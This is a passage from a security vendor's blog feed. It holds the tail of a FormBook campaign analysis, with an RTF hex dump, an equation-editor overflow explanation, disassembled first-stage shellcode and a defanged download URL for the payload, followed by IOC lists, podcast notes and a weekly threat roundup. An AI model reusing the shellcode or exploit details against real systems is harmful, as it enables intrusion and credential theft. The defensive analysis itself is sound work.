00000860  82 15 f0 31 ec 1e 49 93  a2 d4 ef b5 da ae e8 39  |...1..I........9|
00000870  ff d3 ab 65 88 29 2b 4e  be b9 ec 16 e5 7f ab d6  |...e.)+N........|
00000880  08 a7 ec 69 51 38 1f 97  27 27 7d f9 f3 f2 65 83  |...iQ8..''}...e.|

The red value is the stream length.

The blue value is equation editor MTEF header starting by 0x3.

The green value is the font record starting by 0x8. This vulnerability is an overflow on the front name located in grey in the snippet above. The overflow will redirect the flow in order to execute the RET code at the address 0x0041d1e8 (in pink).

Finally, a shellcode is executed.

Here is the first stage of the shellcode:

user@laptop:$ rasm2 -d B8C342BAFFF7D08B388B37BDC698B9FFF7D58B4D7756FFD10563D62D0B2D4DD52D0BFFE0
mov eax, 0xffba42c3
not eax
mov edi, dword [eax]
mov esi, dword [edi]
mov ebp, 0xffb998c6
not ebp
mov ecx, dword [ebp + 0x77]
push esi
call ecx
add eax, 0xb2dd663
sub eax, 0xb2dd54d
jmp eax

The purpose is to execute GlobalLock() (first call) and to finally jump in the second stage of the shellcode in bold orange in the hexadecimal code.

The purpose is to download and execute a binary located on a compromised WordPress website (hxxp://irishlebanese[.]com/wp-admin/images/eight/mine001.exe).

Final payload: FormBook

The final payload is located on a compromised WordPress website (hxxp://irishlebanese[.]com/). The malware author stored many PE32 files on this server, some of which are still available. We have included more than 30 hashes of files stored on this server in the IOCs section. The most recent samples are FormBook samples.

FormBook is an inexpensive stealer available as "malware as a service." It is able to record keystrokes, steal passwords (stored locally and in web forms) and can take screenshots. This post does not describe the malware in-depth, since there are excellent posts on the malware written by other researchers.

Overlaps with previous campaigns

In February 2017, we published an article about another stealer using Publisher and a public exploit to compromise systems. We found three interesting samples related to this case and our current FormBook case:

5aac259cb807a4c8e4986dbc1354ef566a12ced381b702a96474c0f8ff45f825 (located at hxxp://irishlebanese[.]com/wp-admin/admin/dor001.exe in May 2018)
82ce499994e4b2ee46e887946ef43f18b046639e81dfe1d23537ce6a530d8794 (located at hxxp://irishlebanese[.]com/wp-admin/admin/mine001.exe in May 2018)
8f6813634cb08d6df72e045294bf63732c0753f79293f1c9b2765f686f699a72 (located at hxxp://irishlebanese[.]com/wp-admin/admin/mine001.exe in May 2018)

These three samples use the same FormBook infrastructure and the Pony infrastructure mentioned in our previous article:

hxxp://alphastand[.]top/alien/fre.php -> command and control (C2) server from 2017
hxxp://ukonlinejfk[.]ru/mine/fre.php
hxxp://alphastand[.]trade/alien/fre.php -> C2 server from 2017
hxxp://igtckeep[.]com/dor/fre.php
hxxp://alphastand[.]win/alien/fre.php -> C2 server from 2017
hxxp://kbfvzoboss[.]bid/alien/fre.php -> C2 server from 2017
hxxp://www.cretezzy[.]com/do/ -> FormBook C2 server
hxxp://www.beemptty[.]com/se/ -> FormBook C2 server

The infrastructure sharing suggests that this is a common actor currently using two different stealers. Based on the timeline, we assume that the actor is currently moving from Pony to FormBook, another stealer.

Conclusion

This case shows us that malicious actors play with multiple file formats and embedded objects. In this campaign, the author used a PDF with an embedded Office document template using a vulnerability in order to download an additional Office RTF document, and then a second vulnerability and exploit in order to compromise the target. The attacker used an unfamiliar file-sharing platform in order to store the malicious document and a compromised WordPress site in order to store the final payload. We did notice that the file-sharing platform is reactive, removing the malicious files quickly, stopping the infection chain.

Some technical elements, such as infrastructure sharing, show us that the actor behind this campaign is probably the same actor behind a campaign we described one year ago. Last month it used two stealers in parallel on the same infrastructure. Based on the information we have today, he/she no longer uses Pony, but switched to FormBook in order to steal information on compromised systems.

Coverage

Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IOCs

PDF

8f859c1a9965427848315e9456237e9c018b487e3bd1d632bce2acd0c370341e

Embedded And Attached dotm

04f093a3b867918dce921fe2ba40dcdae769b35dbce3047aacdb151e2208ea5c

Malicious Document Hosted On The Files Sharing Platform

4c16046966a5fd06c84213aa67bfa37949800980915e9b511384ec17dc7eb7b1 -> hxxps://pomf[.]pyonpyon[.]moe/pajelx.doc
04f093a3b867918dce921fe2ba40dcdae769b35dbce3047aacdb151e2208ea5c -> hxxps://pomf[.]pyonpyon[.]moe/cgcvsc.doc
59cf77148cbbf24d395d09192ce43ac5395087f3e499cda350e3a93f13e37de1 -> hxxps://pomf[.]pyonpyon[.]moe/btgppc.doc
D83f874dda2fa3e4339399c786e9497c1b440019fa5ee5925738fc3afa67352c -> hxxps://pomf[.]pyonpyon[.]moe/ejmhsu.doc
35ea3d8272751d60bd3106e548444588b1959622dfdcf11be14b80786bdb25e6 -> hxxps://pomf[.]pyonpyon[.]moe/cnlvop.doc
5e9979a9676889a6656cbfa9ddc1aab2fa4b301155f5b55377a74257c9f9f583 -> hxxps://pomf[.]pyonpyon[.]moe/hbhjks.doc
0b0615eb8e4c91983fab37475ecc374f79c394768a33ea68c2208da1c03e5a43 -> hxxps://pomf[.]pyonpyon[.]moe/zkxsam.doc
Fccc874f4f741231673f5a3c0bdc4c6bfd07f1b1e93f7c64e2015c393966216e -> hxxps://pomf[.]pyonpyon[.]moe/neitsj.doc
13ce56581c8ad851fc44ad6c6789829e7c250b2c8af465c4a163b9a28c9b8a41 -> hxxps://pomf[.]pyonpyon[.]moe/lhvazm.doc
541ea322a3a6385211566f95cef333580a62341dac397e044a04504625acdd0d -> hxxps://pomf[.]pyonpyon[.]moe/cgcvsc.doc
062ae7152d8e8f3abb093e55c5a90213134dd278ac28cfeb18e81132232dcbe8 -> hxxps://pomf[.]pyonpyon[.]moe/tewkco.doc
0ddf7e87957932650679c99ff2e2380e2be8a203d1142f19a22ad602047f372e -> hxxps://pomf[.]pyonpyon[.]moe/lhvazm.doc
1debc4e22a40f4f87142e7e40094ce1a9aa10462f0c6d1c29aa272d7d6849205 -> hxxps://pomf[.]pyonpyon[.]moe/zkxsam.doc

PE32 Hosted On The irishlebanese Website

d7f0f3fea2f9935c1dd7bda343ec1e3fb77457e68b16b9d51516a3d8c651d14f
05a945fc7a9eb4c9a4db8eb974333b3938c06d9299976075b2fc00a79cf0a129
91a471ba534219f05c31d204b3c5217cde7c67f70600aa3abba334888f628376
f7e97000615ee77093c4ec49f3cbe4b8cb3dc6feafc74ae8d59f01f05dc4280e
23c40f55797b07b2d9bf1e314ea928b1151af2b2e605aa520a715fe56e481528
1d706a3c85973fe96240a254abff52c0593b4aa0c283d3ecc28df6f8baed853b
e8f0136abc46b668d44586a6b5a394b470af6af8e9d91bddca4b70e3e66768d1
958ee876ebaab71ea2ef9fcda6a08598319578ccc1f4bd9baa3a54114b88abdc
b031075b8ad2558ee3ee7f0749c2b24484dd6fab7252fad71548276514b9b766
667cc420816fd71ae54869b4c0f05129cc5972dbc47f7a98776fc63a72d77691
7db8273fd25088900cffa036eb631ffcee40302dd7b33a7d4f3e653e7ab091c0
3efdc8b15e324cd9323cdbd34fbd19979d6eeb95fe1120ed3a95dc24fab67397
189e2494b19773f9b72072774891378f5809c7bfb121dcba2cee13e6f91ed619
bd44861de18d5bbf71d2d64e29ff9f1d8495f97f5ba0b49eacb504b3768a89bb
e0282f51ac3bfba5774893c8b70c31600d7e4bd7f6d7231fd33315396cd18b78
83fa11d8711ef22437681e09a4be500cfaf49ac7cb29837ff6a42fb46b09d789
14ce215b561dc43104e400c0eb877d876f6e9be77c5b2994b9b8745b2132d914
226d38382415b935d849539c0b6305a4259c26dfa7317b944f8498cd3e65850f
dd1eeb128b1d1eb40e74281aec79828d7d7179a0375bda5e85ce5fd2fac064a2
a7422eddb437a33d730ab70bd1267d815fc3761d5eda9781de91d0bdeeb823ff
2a21f728282b33b89e6cbd99db52651931b534be9837d99eacf87cfd748c3cba
91b6219f4a8903773492fd83fe02e6aa8729e378f559c5cc9f115a2304f89e57
4f73923c23354ac5050f012f607342362eaf1d691ce1b64ea1e831038cc4236c
ebbed2fcd7fe4dc8a95cc60ab9c8e98609bcf3ba5696507252c65cc6be748b14
d1f9549943b936ba54d87a5befd2d241fcddac6f0caf8c786f6034ab18b8e61d
ae7cacc7a16cb48cb40473ad0269331c392f8eb0fef8ebe2d90f3592fccb306c
00cb817330768b33a30bcf7a6a67d0269aa32f8099aee3ecd18da0e31d096610
e93994bf78b13d3bdee1682faf6c6544246fbd6d95a0aa043ac175ad0b905646
822c1239203db0bfdde3d0b65f50e53f7ee155638d4743b14f58267fa3e76531
5aac259cb807a4c8e4986dbc1354ef566a12ced381b702a96474c0f8ff45f825
8f6813634cb08d6df72e045294bf63732c0753f79293f1c9b2765f686f699a72
82ce499994e4b2ee46e887946ef43f18b046639e81dfe1d23537ce6a530d8794

C2 Servers

hxxp://www[.]drylipc[.]com/em1/
hxxp://www[.]handanzhize[.]info/d5/
hxxp://www[.]bddxpso[.]info/d7/
hxxp://www[.]newraxz[.]com/as/
hxxp://www[.]atopgixn[.]info/de8/
hxxp://www[.]cretezzy[.]com/am/
hxxp://www[.]casiinoeuros[.]info/d3/
hxxp://www[.]newraxz[.]com/as/
hxxp://www[.]cretezzy[.]com/do/
hxxp://www[.]newraxz[.]com/as/

Overlaps Samples

5aac259cb807a4c8e4986dbc1354ef566a12ced381b702a96474c0f8ff45f825
hxxp://alphastand[.]top/alien/fre.php
hxxp://alphastand[.]trade/alien/fre.php
hxxp://igtckeep[.]com/dor/fre.php
hxxp://alphastand[.]win/alien/fre.php
hxxp://kbfvzoboss[.]bid/alien/fre.php
hxxp://www[.]cretezzy[.]com/do/

8f6813634cb08d6df72e045294bf63732c0753f79293f1c9b2765f686f699a72
hxxp://ukonlinejfk[.]ru/mine/fre.php
hxxp://alphastand[.]top/alien/fre.php
hxxp://alphastand[.]trade/alien/fre.php
hxxp://alphastand[.]win/alien/fre.php
hxxp://kbfvzoboss[.]bid/alien/fre.php
hxxp://www[.]beemptty[.]com/se/

82ce499994e4b2ee46e887946ef43f18b046639e81dfe1d23537ce6a530d8794 hxxp://ukonlinejfk[.]ru/mine/fre.php
hxxp://alphastand[.]top/alien/fre.php
hxxp://alphastand[.]trade/alien/fre.php
hxxp://alphastand[.]win/alien/fre.php
hxxp://kbfvzoboss[.]bid/alien/fre.php
hxxp://www[.]beemptty[.]com/se/

↧

Beers with Talos EP31 - Live from Cisco Live! - VPNFilter and Our First Summit Recap

June 22, 2018, 5:58 am

≫ Next: Threat Roundup for June 16-22

≪ Previous: My Little FormBook

Beers with Talos (BWT) Podcast Episode 31 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing: www.talosintelligence.com/podcast

EP31 Show Notes:

Recorded June 12, 2018 — This is a special episode for two reasons! To start, we recorded this live in one take from CiscoTV Studio B at Cisco Live! in Orlando, Florida — which leads to the second reason, there is video of this episode in the show notes below. Join us as we cover the VPNFilter update Talos released June 6, and we recap the inaugural Cisco Talos Threat Research Summit.

Ed. Note - This is what no content editing looks like...
TL;DL — The summit went great, Lurene’s keynote was as amazing as advertised, Craig has no idea how video switchers work, Mitch got a bad haircut just before doing a video podcast, VPNFilter is still bad news and can really only get worse, there’s lots of random Segway-type scooter-things milling about Cisco Live! Like, an inordinate amount.

The Timeline:

The Roundtable

07:20 - Craig: TTRS went shockingly well
09:03 - Joel: Surviving in Occupied Orlando #BanPepsi
12:29 - Nigel: The world is at a standstill
14:18 - Matt: The U.S. isn’t playing in the World Cup so… Go Egypt?

The Topics

19:23 - TTRS recap: Highlights, key points, and a glimpse of what comes next
34:19 - VPNFilter update: Discussing the updated model list, clearing up some common confusion, and the later discovered stage 2/3 modules.

The Links:

VPNFiler update: https://blog.talosintelligence.com/2018/06/vpnfilter-update.html

The Video:

==========

Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC). Special Guest Nick Biasini (@infosec_nick).
Hosted by Mitch Neff (@MitchNeff).

Find all episodes:
http://cs.co/talospodcast

Subscribe via iTunes (and leave a review!)
http://cs.co/talositunes

Check out the Talos Threat Research Blog:
http://cs.co/talosresearch

Subscribe to the Threat Source newsletter:
http://cs.co/talosupdate

Follow Talos on Twitter:
http://cs.co/talostwitter

Give us your feedback and suggestions for topics:
beerswithtalos@cisco.com

↧

Threat Roundup for June 16-22

June 22, 2018, 4:05 pm

≫ Next: Files Cannot Be Decrypted? Challenge Accepted. Talos Releases ThanatosDecryptor

≪ Previous: Beers with Talos EP31 - Live from Cisco Live! - VPNFilter and Our First Summit Recap

As usual, we are bringing you the weekly Threat Roundup to highlight the most prevalent threats we've seen between June 15 and 22. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and is current as of the date of publication. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

The most prevalent threats highlighted in this round up are:

Win.Dropper.Generic-6584427-0
Dropper
This dropper attempts to allocate a memory region with the flag PAGE_EXECUTE_READWRITE to later inject malicious code and then execute it. These samples also contain TLS callback entries, which allow malware authors to execute malicious code before the debugger has a chance to pause at the traditional entry point.
Win.Dropper.Fareit-6584428-0
Dropper
Fareit dropper injects code into legitimate system processes, usually through an evasion technique called process hollowing. Some samples may use VB scripts to execute some of its malicious activities and modifies autorun registry keys to maintain persistence on the host.
Win.Dropper.Zbot-6584477-0
Dropper
Zbot (AKA Zeus bot) is info stealing malware targeting users banking credentials. You can read more on our blog https://talosintelligence.com/zeus_trojan.
Win.Trojan.Generic-6584512-1
Trojan
This trojan is sometimes related to the Emotet malware family. It creates a copy of itself in system directories such as C:\Windows\SysWOW64\. It is also capable of uploading files with information about the infected system to remote servers and adds a file as a Service in the System Registry Current Control Set.
Win.Malware.Installcore-6584374-1
Malware
This adware creates a copy of itself in %APPDATA% with the "tmp" extension. Some samples contain a library reference to the SetWindowsHookEx function that could be use to monitor keyboard or other user input, which could indicate keylogger capabilities.
Win.Trojan.Jaik-6584366-1
Trojan
Jaik contains a library reference to the VisualBasic runtime DLL, which allows the process to run Visual Basic scripts directly or internally. It also attempts to allocate a memory region with the flag PAGE_EXECUTE_READWRITE to later inject malicious code and then execute it.

Threats

Win.Dropper.Generic-6584427-0

Indicators of Compromise

Registry Keys

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\CONTENT
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\COOKIES
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\HISTORY
<HKCR>\LOCAL SETTINGS\MUICACHE\3E\52C64B7E

<HKLM>\SYSTEM\CONTROLSET001\CONTROL\NETWORK\{4D36E972-E325-11CE-BFC1-08002BE10318}\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}\CONNECTION

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\LruList
<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\LRULIST\00000000000029D3

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB5\INDEXES\FileIdIndex-{3f37ba64-ef5c-11e4-bb8d-806e6f6e6963}

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\INDEXTABLE\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}
<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\LRULIST
<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\LRULIST\00000000000029D3
<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB5
<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB5
<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB5
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\33fd244257221b4aa4a1d9e6cacf8474
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\4c8f4917d8ab2943a2b2d4227b0585bf
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5309edc19dc6c14cbad5ba06bdbdabd9
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\82fa2a40d311b5469a626349c16ce09b
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9e71065376ee7f459f30ea2534981b83
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\a88f7dcf2e30234e8288283d75a65efb
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\c02ebc5353d9cd11975200aa004ae40e
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\d33fc3b19a738142b2fc0c56bd56ad8c
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\df18513432d1694f96e6423201804111
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ecd15244c3e90a4fbd0588a41ab27c55
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB5\INDEXES\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\INDEXTABLE\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}\10000000090A2

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB5
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN

Mutexes

8-3503835SZBFHHZ
O957R401SY5ZZzJz

IP Addresses

198.54.117.218
104.27.180.157
184.168.221.104
52.72.89.116
64.98.145.30
107.173.153.58
162.213.249.103
180.76.141.40
217.76.128.34
104.237.136.127

Domain Names

www.dingjian1688.com
www.tradewindsonlinemall.com
www.mewqaccmertgroup.com
www.holymedgap.com
www.tealeurope.com
www.clinicaslipedema.com
www.christynhomes.com
www.oliver-group.com
www.eloloans.com
www.yourdready.com
www.cinderellagames.com

Files and or directories created

%AllUsersProfile%\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol
%LocalAppData%\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol
\PC*\MAILSLOT\NET\NETLOGON
%AllUsersProfile%\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol
%WinDir%\AppCompat\Programs\RecentFileCache.bcf
%ProgramFiles% (x86)\Bzv1lxh98
%ProgramFiles% (x86)\Bzv1lxh98\igfxnpttjhuh.exe
%LocalAppData%\Temp\Bzv1lxh98
%LocalAppData%\Temp\Bzv1lxh98\igfxnpttjhuh.exe
%ProgramFiles% (x86)\Bzv1lxh98\igfxnpttjhuh.exe
%AppData%\O957R401
%AppData%\O957R401\O95log.ini
%AppData%\O957R401\O95logim.jpeg
%AppData%\O957R401\O95logrc.ini
%AppData%\O957R401\O95logim.jpeg
%AppData%\O957R401\O95logrc.ini
\TEMP\tmpQDq_1r.exe

File Hashes

20c27455b4a86eda29e494e4241f95599175133f8d852759be88641654374ef6
286a7c32ede0a4650e399ee1fefc347d9265befc3381eacefdc63937e19cd6d4
349a7f3b6c5cdb14d58b7eb8d2256a593f3097bf22960504d6d094472fbd1366
3522d25848b5fe656d1fb100ae5d546f376569f8441f5c0e7745f4ac234a5c55
7165fc0f622effb44f6893555e898f3cafea60858923409863e0e2528536999d
7dd9adc72effd65e28191edfd0e282eb4375c3206983fdfae255d12d2f407e91
a6e515869be77e1f332df975ca719a54544a0fa56698607788294215369b2ff6
bf9274591ed4a439d9b5d8fd6e4c620804e7c33130c8cdc8258df3de7f330fd6
e1f0bfaa87925d5f89b9ccc3196246b26296a1ea305ab3bab6e681a78d130bf4
e3f0529b2f75ca2930b2bc3dc22d2ada08491abf7a3f384e8ef81ae91ef2b25d
fcf94877a6daa05e2e22d70f2d2deb469a655d77a8318a7d2b038a331364e780

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Dropper.Fareit-6584428-0

Indicators of Compromise

Registry Keys

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\HISTORY
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\COOKIES
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\CONTENT
<HKLM>\Software\Microsoft\Fusion\GACChangeNotification\Default
<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

Mutexes

IP Addresses

216.146.43.71

Domain Names

checkip.dyndns.org

Files and or directories created

%AppData%\MDU Resources Group Inc\MDU Resources Group Inc.exe
%AppData%\MDU Resources Group Inc\MDU Resources Group Inc.exe
%AppData%\MDU Resources Group Inc

File Hashes

09aee7d45b4d4990fbfe44fbc41d908d363c3c6b3a68a633b6d0d88819dd8203
0ab5ea239c3b4a2eae0c9a8d7fe6fbfceb877e542a823bf971e712efaac84a00
0ad759f72f4c8fcfb84067b4b53776763c2e5b663ee1617f15135918a056bc4f
21793b775320c182c4db6ffd742445ddddc9dd4925ef1ca979ed6a35c617fd45
27a501fb263df4360b53753c91a66bda55541d7e0b43e5698665978f537a2eb8
2ff4ee2c05c59076e923c0ee07a27a2f8434fcfe047d341538b1ea8cdfa6729d
3ac4b5cd646a722924118e761366480c83ab278dbb5416a5e58e0eddf3a1b903
406d5dc4de69215015543a52be7d3bafdeb7191adc98084563d55b5996659ce4
437068cc219c152d4bef83c2dd6916e0c0a090eb607c68018c28c6ac82c84b2f
4c65d4cf2a7773a7358323b826665b0dcc8eefaa6cc543fb493f3aff3329804a
7ff6c48e69875b5d824d1a6b005e179002076f4ce90fce5c9a22f044ac65291c
94a44a077ea320d2bbf338b72fa4c263d8cf70eb398c5ffb07d5dc7e0adf840d
a92ad1f6f77b663420940708572de26cbaaeb70d4e22114f7c1c8f62d7f4d500
b381f69867fff9a3e07c84f7186a1ed86dbf98c7b9f09df3978b6649e13fb1c3
b5e589fd4e4522ab6320a76a1c2e69e6e1e557628e87cc16e0572ef0f31453d8
c0b1a8acf40906c0c0ee2041ee1e3f1c04ec0b73602b0ed8e8e97104075c70a7
c11d18e057fd911901e9473689b04156110cf5eea97e4b33f363b00ad0d161e0
c4df3b3743c9696c5f20b9763644bff65500440019bbc83f85930ddb287a936b
e18f8ac7f8275e648ef44c882e032389770e0ce4fda43142b69ab23ab4e9f45d
e9c8209739ed62082a8f9cb4067ab2c8ff2588db6c0a165726b55cb5bef62695
f32c8bd9e3c0bedcbe6c33d08723513d3da438219902c25012c10d648a11d824
f51967541563d54bd8e7219a127d5f2189cf01eb33236729b3dbb540b171d17d
fd29ce672f03d7970cbedcd45a75e512a1df62e758f5776b90e1af6f1a2c2f2c

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Dropper.Zbot-6584477-0

Indicators of Compromise

Registry Keys

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC\PARAMETERS\PORTKEYWORDS\DHCP
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NETBT\PARAMETERS\INTERFACES\TCPIP_{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
<HKCU>\SOFTWARE\MICROSOFT\Ycbi
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
<HKCU>\SOFTWARE\Microsoft\Ycbi
<HKCU>\Software\Microsoft\Windows\Currentversion\Run
<HKCU>\SOFTWARE\MICROSOFT\YCBI
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\CONTENT
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\COOKIES
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\HISTORY
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102
